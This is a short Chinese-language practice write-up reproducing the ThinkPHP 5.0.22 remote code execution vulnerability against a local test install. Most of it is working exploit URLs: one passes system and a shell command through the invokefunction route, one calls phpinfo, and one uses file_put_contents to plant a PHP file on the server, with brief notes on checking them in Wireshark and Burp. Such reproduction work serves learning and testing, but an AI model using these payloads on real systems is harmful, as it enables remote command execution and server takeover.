ThinkPHP5漏洞复现:
测试版本:ThinkPHP_full_v5.0.22
远程执行命令漏洞:
首先工具检测漏洞是否存在:
远程执行命令,wireshark抓包:
直接得到poc:
http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令]
用BP验证:
获取PHP信息的poc:http://127.0.0.1/tp5/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
用BP验证:
然后,写入phpinfo:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E
访问http://127.0.0.1/tp5/public/info.php
显示PHP信息即成功!
《小白初练》